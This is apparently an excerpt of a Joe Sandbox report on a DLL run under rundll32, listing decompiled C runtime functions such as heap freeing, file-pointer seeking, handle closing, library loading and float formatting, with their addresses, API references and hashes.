0x10025e19
0x10025e1f
0x10025e22
0x10025e28
0x10025e2b
0x10025e2e
0x00000000
0x00000000
0x10025e30
0x10025e39
0x10025e3d
0x10025e46
0x10025e4a
0x10025e4b
0x10025e51
0x10025e57
0x10025e5d
0x10025e60
0x00000000
0x00000000
0x10025e62
0x10025e81
0x10025e81
0x10025e84
0x10025ea1
0x10025ea6
0x10025ea9
0x10025eab
0x10025ee9
0x10025ead
0x10025ead
0x10025eb3
0x10025eb8
0x10025ec0
0x10025ec1
0x10025ec1
0x10025ed8
0x10025edf
0x10025ee2
0x10025ee4
0x10025ee4
0x10025eef
0x10025ef5
0x10025ef5
0x10025efa
0x00000000
0x10025efa
0x10025e64
0x10025e66
0x10025e6b
0x10025e71
0x10025e7a
0x10025e7d
0x10025e7d
0x00000000
0x10025e66
0x10025f1d
0x10025f1d
0x10025f21
0x10025f29
0x10025f2f
0x10025f32
0x10025f38
0x10025f3a
0x10025f86
0x10025f8c
0x10025fd8
0x10025fd8
0x10025f8e
0x10025f93
0x10025f93
0x10025f99
0x10025f9d
0x00000000
0x10025f9f
0x10025fa3
0x10025fac
0x10025fb8
0x10025fbd
0x10025fc6
0x10025fcc
0x10025fcf
0x10025fcf
0x10025f9d
0x10025fde
0x10025fe6
0x10025fec
0x10025fef
0x10025f3c
0x10025f42
0x10025f4c
0x10025f5e
0x10025f65
0x10025f72
0x00000000
0x10025f72
0x00000000
0x10025f3a
0x10025db7
0x10025d2f
0x10025d2f
0x10025f77
0x10025f7c
0x10025f85
0x10025f85
0x00000000
0x10025d2d
0x10025d26
0x10025d28
0x10025d28
0x00000000
0x10025d28
0x10025adf
0x10025adf
0x10025ae2
0x10025ae7
0x10025c4f
0x00000000
0x10025aed
0x10025aef
0x10025af7
0x10025afd
0x10025afe
0x10025b04
0x10025b05
0x10025b0a
0x10025b10
0x10025b13
0x10025b15
0x10025b17
0x10025b18
0x10025b18
0x10025b26
0x10025b26
0x10025b29
0x10025b2c
0x10025b2e
0x10025b31
0x10025b33
0x10025b33
0x10025b36
0x10025b36
0x10025b39
0x10025b3c
0x00000000
0x10025b42
0x10025b42
0x10025b44
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10025b44
0x10025b3c
0x10025ae7
0x10025ad9
0x10025aac
0x10025aae
0x10025aaf
0x10025ab2
0x00000000
0x00000000
0x00000000
0x00000000
0x10025ab2
0x10025aaa
0x10025a32
0x00000000
0x10025a26
0x10025b4a
0x00000000
0x10025b4a
0x100259f9
0x100259ee
0x100259e3
0x1002599c
0x1002599c
0x1002599e
0x100259b5
0x100259a0
0x100259a0
0x100259a1
0x100259a2
0x100259a3
0x100259a8
0x10025c40
0x10025c45
0x10025c4e
0x10025c4e
0x1002599a
0x00000000

APIs

Part of subcall function 10024214: RtlAllocateHeap.NTDLL(00000000,00000000,7248FFF6,?,1002B00A,1004B440,00000018,00000003), ref: 10024246

_free.LIBCMT ref: 100258E5
_free.LIBCMT ref: 100258FC
_free.LIBCMT ref: 10025919
_free.LIBCMT ref: 10025934
_free.LIBCMT ref: 1002594B

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction ID: b32e4abf061af2b49d691e16b66c44ce7c89ffe3064c7ed98f8274118a3d5f98
Opcode Fuzzy Hash: c8deb1e05cff4424f4da417d3cc957bce7d533f51347170508de89e8b0074e68
Instruction Fuzzy Hash: 3251F471A00705EFDB11CF69EC41B6A73F4FF48765B914569E84AE7250EB32EA40CB84

Uniqueness

Uniqueness Score: -1.00%

Function 1003939F, Relevance: 7.6, APIs: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1003939F(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E10024468(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12);
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E1002449E(__eflags);
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(__eflags > 0) {
						goto L6;
					}
				}
				return _t21;
			}

0x1003939f
0x100393ab
0x100393bd
0x100393bf
0x100393c6
0x1003941b
0x00000000
0x1003941b
0x100393ce
0x100393d8
0x100393de
0x100393e1
0x100393e4
0x100393ea
0x100393ec
0x00000000
0x00000000
0x100393ee
0x100393f1
0x100393f4
0x100393f6
0x100393ff
0x100393ff
0x1003940a
0x10039410
0x10039415
0x00000000
0x10039415
0x100393f8
0x100393fd
0x00000000
0x00000000
0x100393fd
0x10039420

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 100393B5
GetLastError.KERNEL32(?,?,?), ref: 100393BF
__dosmaperr.LIBCMT ref: 100393C6
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 100393E4
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 1003940A

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction ID: b407cb5834295830b04853e8380503d0af7682c42ed55c8a01c32ac15598fb64
Opcode Fuzzy Hash: 7f5e605ce626f3b9d429008f912446ca5937876e218be303b3a75fe368ac3108
Instruction Fuzzy Hash: C6015371901129FFDB12EFA1CC4899F3FBDEF017A1F518554F8249A1A0CB309A81DAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002F136, Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1002F136(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x1004d788; // 0x1004d7dc
					if(_t23 != 0) {
						E100268B3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x1004d78c; // 0x1004e868
					if(_t24 != 0) {
						E100268B3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x1004d790; // 0x1004e868
					if(_t25 != 0) {
						E100268B3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x1004d7b8; // 0x1004d7e0
					if(_t26 != 0) {
						E100268B3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x1004d7bc; // 0x1004e86c
					if(_t27 != 0) {
						return E100268B3(_t6);
					}
				}
				return _t6;
			}

0x1002f13c
0x1002f141
0x1002f145
0x1002f14b
0x1002f14e
0x1002f153
0x1002f157
0x1002f15d
0x1002f160
0x1002f165
0x1002f169
0x1002f16f
0x1002f172
0x1002f177
0x1002f17b
0x1002f181
0x1002f184
0x1002f189
0x1002f18a
0x1002f18d
0x1002f193
0x00000000
0x1002f19b
0x1002f193
0x1002f19e

APIs

_free.LIBCMT ref: 1002F14E

Part of subcall function 100268B3: HeapFree.KERNEL32(00000000,00000000), ref: 100268C9
Part of subcall function 100268B3: GetLastError.KERNEL32(?,?,1002F4C1,?,00000000,?,00000000,?,1002F7E1,?,00000007,?,?,1002E30A,?,?), ref: 100268DB

_free.LIBCMT ref: 1002F160
_free.LIBCMT ref: 1002F172
_free.LIBCMT ref: 1002F184
_free.LIBCMT ref: 1002F196

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction ID: 6117e9590aa72a6bc89c84abd52b3ea92389668d0d0b3033db3b93dc22f4f4dd
Opcode Fuzzy Hash: 5531a22311ceddaea5acc387867cdcf4cf3bdb236a1700b2eee16107d713e9dc
Instruction Fuzzy Hash: 70F09631508210D7E650EBA4FEC6C2673E9EA053D43E0492EF458D7600CB30FC808E94

Uniqueness

Uniqueness Score: -1.00%

Function 100055B0, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E100055B0(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* __esi;
				void* __ebp;
				void* _t19;
				void* _t21;
				signed int _t26;
				signed int _t35;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int* _t44;

				_t34 = __ecx;
				_t33 = __ebx;
				_t42 = _a4;
				_push(__edi);
				_t40 =  *_t42;
				if( *_t40 == 0xe0434352 ||  *_t40 == 0xe0434f4d) {
					_t19 = E10005A3D(_t33, _t34, _t38, _t42);
					__eflags =  *(_t19 + 0x18);
					if( *(_t19 + 0x18) > 0) {
						_t21 = E10005A3D(_t33, _t34, _t38, _t42);
						_t3 = _t21 + 0x18;
						 *_t3 =  *(_t21 + 0x18) - 1;
						__eflags =  *_t3;
					}
				} else {
					if( *_t40 == 0xe06d7363) {
						 *((intOrPtr*)(E10005A3D(__ebx, __ecx, _t38, _t42) + 0x10)) = _t40;
						_t43 =  *((intOrPtr*)(_t42 + 4));
						 *((intOrPtr*)(E10005A3D(__ebx, __ecx, _t38, _t43) + 0x14)) = _t43;
						E1001200F(__ebx, __ecx, _t38, __eflags);
						asm("int3");
						_push(__ecx);
						_push(__ecx);
						_push(_t43);
						_t44 = _v8;
						 *_t44 =  *_t44 & 0x00000000;
						_t26 =  *(E10005A3D(_t33, __ecx, _t38, _t44) + 0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							L12:
							__eflags = 0;
							return 0;
						}
						_t35 =  *(_t26 + 0x1c);
						__eflags = _t35;
						if(_t35 == 0) {
							goto L12;
						}
						__eflags =  *_t35 & 0x00000010;
						if(( *_t35 & 0x00000010) == 0) {
							_t15 =  &_v12;
							 *_t15 = _v12 & 0x00000000;
							__eflags =  *_t15;
							_v16 = _t26;
							_push( &_v16);
							_push(0x1004d938);
							 *_t44 = E10005672(_t33, _t40);
							goto L12;
						}
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)))) - 4));
					} else {
					}
				}
				return 0;
			}

0x100055b0
0x100055b0
0x100055b4
0x100055b7
0x100055b8
0x100055c0
0x100055d4
0x100055d9
0x100055dd
0x100055df
0x100055e4
0x100055e4
0x100055e4
0x100055e4
0x100055ca
0x100055d0
0x100055f2
0x100055f5
0x100055fd
0x10005600
0x10005605
0x10005609
0x1000560a
0x1000560b
0x1000560c
0x1000560f
0x10005617
0x1000561a
0x1000561c
0x1000564d
0x1000564d
0x00000000
0x1000564d
0x1000561e
0x10005621
0x10005623
0x00000000
0x00000000
0x10005625
0x10005628
0x10005634
0x10005634
0x10005634
0x10005638
0x1000563e
0x1000563f
0x1000564b
0x00000000
0x1000564b
0x00000000
0x00000000
0x100055d2
0x100055d0
0x100055ec

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 10005644

Strings

RCC, xrefs: 100055BA
MOC, xrefs: 100055C2
csm, xrefs: 100055CA

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: __is_exception_typeof
String ID: MOC$RCC$csm
API String ID: 3140442014-2671469338
Opcode ID: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction ID: ba491e0a52f827d7fd065b4ce93cba473ca224792a09d2010a1ea98d05584bc9
Opcode Fuzzy Hash: b914a401b69bdfb5fc4e46e32a2ec8f7a63b43eb0d1bf4c1cf013341ff5cac62
Instruction Fuzzy Hash: 24116075504204DFEB08DF64C841A9BB7F8EF052D7F51009AE8418B265E776FE40CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1003BC37, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1003BC37(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E100322AE(_t33) != 0xffffffff) {
					_t13 =  *0x1004e628; // 0x317b38
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E100322AE(2);
						if(E100322AE(1) == _t21) {
							goto L1;
						}
						L7:
						if(CloseHandle(E100322AE(_t33)) != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E1003221D(_t33);
						 *((char*)( *((intOrPtr*)(0x1004e628 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E10024468(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x1003bc3e
0x1003bc4b
0x1003bc51
0x1003bc59
0x1003bc67
0x00000000
0x00000000
0x00000000
0x00000000
0x1003bc6f
0x1003bc6f
0x1003bc71
0x1003bc83
0x00000000
0x00000000
0x1003bc85
0x1003bc95
0x00000000
0x00000000
0x1003bc9d
0x1003bc9f
0x1003bca0
0x1003bcb8
0x1003bcbf
0x00000000
0x1003bccd
0x00000000
0x1003bcc8
0x1003bc59
0x1003bc4d
0x1003bc4d
0x00000000

APIs

CloseHandle.KERNEL32(00000000), ref: 1003BC8D
GetLastError.KERNEL32(?,1003BA56,?,1004B6E0,0000000C,1003BC17,?,?,?), ref: 1003BC97
__dosmaperr.LIBCMT ref: 1003BCC2

Strings

8{1, xrefs: 1003BC51

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID: 8{1
API String ID: 2583163307-1210895677
Opcode ID: 72f9e405a3e0aded8a94c5d7cbe51c4483ac60f3e4ebb85620b804f4ca66133f
Instruction ID: 5a95298400e09611cdde6b48d7188b83264b713d2b6cc128102f312a6002e825
Opcode Fuzzy Hash: 72f9e405a3e0aded8a94c5d7cbe51c4483ac60f3e4ebb85620b804f4ca66133f
Instruction Fuzzy Hash: DC012F32A155601ED227D3345D96B5E2789CBC377AF270159EE08DF1D2DE60AC818190

Uniqueness

Uniqueness Score: -1.00%

Function 1000D7D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000D7D1(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E10023828(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x1000d7de
0x1000d7e6
0x1000d81b
0x1000d7e8
0x1000d7f1
0x00000000
0x1000d818
0x1000d817
0x1000d817

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,1000D78C), ref: 1000D7DE
GetLastError.KERNEL32(?,1000D78C), ref: 1000D7E8
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 1000D810

Strings

api-ms-, xrefs: 1000D7F5

Memory Dump Source

Source File: 00000008.00000002.2095239693.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2095230342.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095286062.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2095299612.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2095306831.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction ID: e74e9b093023e81d82c4867d880b496c8476b2db1d57206d9312647a4de92240
Opcode Fuzzy Hash: c18fc0f17150ae9d2d73f8c91026e07452c88061d280a2e73323492415867ff1
Instruction Fuzzy Hash: D4E04830380249B7FF006F60DD46B4D3B58EB11AC1F60C431FA0CE80F5DB61A85586A8

Uniqueness

Uniqueness Score: -1.00%

Function 1002D2F3, Relevance: 6.3, APIs: 4, Instructions: 320
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E1002D2F3(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E1000F794( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t18 = _t177 + 1; // 0x2
							_t165 = _t18;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t26 =  &(_t165[0]); // 0x2
								_t178 = _t26;
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E1003F990( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E1002DB0D(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t50 = _t178 - 1; // 0x2
									_t118 = _t50;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E100050F0(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E1003F990( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t63 = _t105 + 2; // 0x12
										_t168 = _t63;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E1003F890();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E1003F890();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E1003F890();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t68 = _t168 + 1; // 0x2
													_t174 = _t68;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E1002D602(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E10041D10(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E1002449E(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E1000E314();
				goto L66;
			}

0x1002d2f3
0x1002d2fe
0x1002d303
0x1002d305
0x1002d305
0x1002d309
0x1002d312
0x1002d314
0x1002d319
0x1002d31c
0x1002d31f
0x1002d335
0x1002d338
0x1002d33d
0x1002d347
0x1002d34c
0x1002d3a3
0x1002d3a5
0x1002d3b4
0x1002d3b7
0x1002d3b7
0x1002d3ba
0x1002d3bc
0x1002d3c3
0x1002d3d5
0x1002d3d8
0x1002d3dd
0x1002d3e1
0x1002d3e2
0x1002d402
0x1002d405
0x1002d405
0x1002d405
0x1002d407
0x1002d407
0x1002d407
0x1002d40a
0x1002d40d
0x1002d40f
0x1002d420
0x1002d411
0x1002d411
0x1002d411
0x1002d422
0x1002d427
0x1002d427
0x1002d42c
0x1002d42f
0x1002d439
0x1002d43b
0x1002d43d
0x1002d442
0x1002d443
0x1002d446
0x1002d449
0x1002d44c
0x1002d44c
0x1002d44e
0x00000000
0x00000000
0x1002d465
0x1002d46c
0x1002d470
0x1002d473
0x1002d476
0x1002d478
0x1002d478
0x1002d478
0x1002d47e
0x1002d481
0x1002d485
0x1002d487
0x1002d48b
0x1002d48e
0x1002d491
0x1002d492
